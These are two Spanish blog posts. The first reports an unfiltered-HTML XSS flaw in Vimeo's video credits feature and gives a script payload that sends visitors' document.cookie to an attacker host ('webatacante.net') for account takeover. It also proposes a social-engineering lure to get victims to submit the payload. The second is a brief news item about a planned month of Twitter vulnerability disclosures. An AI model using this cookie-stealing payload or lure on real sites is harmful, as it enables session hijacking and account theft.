XSS + Robo de Cookies en Vimeo

http://www.davedixon.org/file.php/1/vimeo.jpg
Mientras comprobaba esa leyenda urbana de que Vimeo es mejor que Youtube, encontré un XSS, que aunque tiene una cierta dificultad de explotar, puede ser interesante de investigar.

El fallo en cuestión se encuentra en la opción de añadir créditos, que tenemos disponible en cualquier vídeo. No filtra en absoluto html, que podemos introducir sin mas problema. :laugh:

La parte interesante es que esto es una llamada AJAX, que por falta de tiempo no he podido seguir investigando, aunque probablemente lo haré en algún post, mas adelante.

http://i39.tinypic.com/eqwi9u.jpg
Haz click para ver la imagen a tamaño completo


Aquí podemos ver un XSS inofensivo, aunque podría utilizarse para robar las cookies, consiguiendo así privilegios completos, un ejemplo seria este código:

<>document.location="http://webatacante.net/galleta.php?galleta="+document.cookie;< /script >


El código del PHP simplemente guardaría a un archivo de texto plano el contenido de la variable galleta, con lo cual solo nos quedaría robar esas cookies, teniendo acceso completo a la cuenta afectada. ;-)
Aun así, al no haber un método directo (o no descubierto) de hacer esto, como puede ser en los XSS por link, habría que hacer un poco de uso de ingeniería social, quizás en un vídeo dejar el código, prometiendo un premio si se introducen como créditos en el mismo vídeo, añadiendo al final el "código del vídeo", que no seria mas que nuestro XSS. ;D

TwitPwn: Desarrolladores sin vacaciones

http://composta.net/diosameba/wp-content/uploads/2009/04/la-ballena-twitter.jpg
Parece que la fiebre del Twitter les va a dar a algunos dolores de cabeza: Aviv Raff, que ya participo en "El mes de las vulnerabilidades en los navegadores", evento que se llevo a cabo con éxito, ha anunciado en TwitPwn que juli sera el "Mes de las vulnerabilidades Twitter"

Planea lanzar una al dia, la mayoia relacionadas con la API de Twitter, y aplicaciones de terceros. Al menos avisará a los desarrolladores con 24 horas de antelacion, ya que segun el, "las vunerabilidades podrian ser utilizadas para crear un worm-Twitter"

Asi que me temo que los desarolladores afectados van a pasar un mes movidito :rolleyes:

Me entere de esto via SbD